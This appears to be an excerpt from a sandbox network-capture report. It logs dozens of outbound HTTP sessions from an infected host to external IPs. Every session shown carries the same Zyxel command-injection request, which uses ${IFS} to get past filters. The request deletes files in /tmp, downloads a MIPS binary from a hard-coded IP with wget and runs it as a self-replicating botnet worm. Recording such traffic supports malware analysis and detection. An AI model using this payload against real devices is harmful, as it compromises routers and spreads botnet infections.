                                        Mar 31, 2024 09:22:49.940649986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9518192.168.2.2360820158.174.76.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940716982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9519192.168.2.235997480.0.121.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940763950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9520192.168.2.233341688.1.56.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940814972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9521192.168.2.2353916126.211.172.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940864086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9522192.168.2.234543646.38.99.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940917015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9523192.168.2.2336210190.248.80.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940954924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9524192.168.2.2338146162.72.214.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.940995932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9525192.168.2.235707050.146.132.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941085100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9526192.168.2.233487027.244.33.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941108942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9527192.168.2.234214445.125.25.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941152096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9528192.168.2.235442874.254.222.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941210032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9529192.168.2.2352116110.76.3.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941267014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9530192.168.2.234844251.12.237.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941318989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9531192.168.2.234298835.92.183.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941373110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9532192.168.2.235734064.36.255.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941418886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9533192.168.2.235594098.26.198.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941499949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9534192.168.2.2342824157.224.222.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941535950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9535192.168.2.2335194147.75.65.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941590071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9536192.168.2.2336364199.187.226.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941663027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9537192.168.2.2358848173.225.110.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941736937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9538192.168.2.2360910119.40.122.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941787004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9539192.168.2.235168274.197.190.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941845894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9540192.168.2.235790468.13.113.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941890001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9541192.168.2.2359374135.123.8.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941915989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9542192.168.2.2346766140.255.204.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.941972017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9543192.168.2.2354916162.163.65.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942013025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9544192.168.2.234334864.74.60.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942054033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9545192.168.2.2360564180.18.7.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942101002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9546192.168.2.233951420.126.27.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942154884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9547192.168.2.2344384165.197.173.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942204952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9548192.168.2.2350822163.221.161.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942264080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9549192.168.2.2342894154.78.81.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942296028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9550192.168.2.2357896147.146.139.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942352057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9551192.168.2.235770096.136.82.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942392111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9552192.168.2.2349886117.72.70.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942441940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9553192.168.2.2349134178.223.234.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942502022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9554192.168.2.2349090223.78.104.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942553043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9555192.168.2.234942076.86.141.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942584991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9556192.168.2.233833445.204.157.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942635059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9557192.168.2.235579478.18.200.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942675114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9558192.168.2.234494874.206.0.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942704916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9559192.168.2.2332846207.48.83.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942760944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9560192.168.2.235141048.83.174.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942859888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9561192.168.2.234181017.67.223.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942909956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9562192.168.2.2345442200.192.254.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.942965984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9563192.168.2.2339872138.31.26.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943013906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9564192.168.2.234734062.229.156.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943048954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9565192.168.2.2341648171.114.116.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943113089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9566192.168.2.2356982218.238.212.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943142891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9567192.168.2.2356606197.37.118.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943186998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9568192.168.2.2357886110.75.32.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943238974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9569192.168.2.236064494.202.191.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943306923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9570192.168.2.2353714211.117.213.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943341970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9571192.168.2.2348608124.184.220.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943393946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9572192.168.2.2335398183.137.205.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943451881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9573192.168.2.2347262162.50.193.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943495035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9574192.168.2.2346418142.111.107.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943535089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9575192.168.2.233397654.211.135.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943627119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9576192.168.2.23465381.31.187.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943639994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9577192.168.2.2341424180.145.238.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943695068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9578192.168.2.235258878.30.168.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943726063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9579192.168.2.235212448.65.51.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943758011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9580192.168.2.234309496.22.184.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943860054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9581192.168.2.2334060145.113.140.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943861008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9582192.168.2.2350898122.240.97.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943898916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9583192.168.2.2354692188.143.206.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.943990946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9584192.168.2.234058032.255.172.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:49.944016933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9585192.168.2.235768873.95.86.147443
                                        TimestampBytes transferredDirectionData
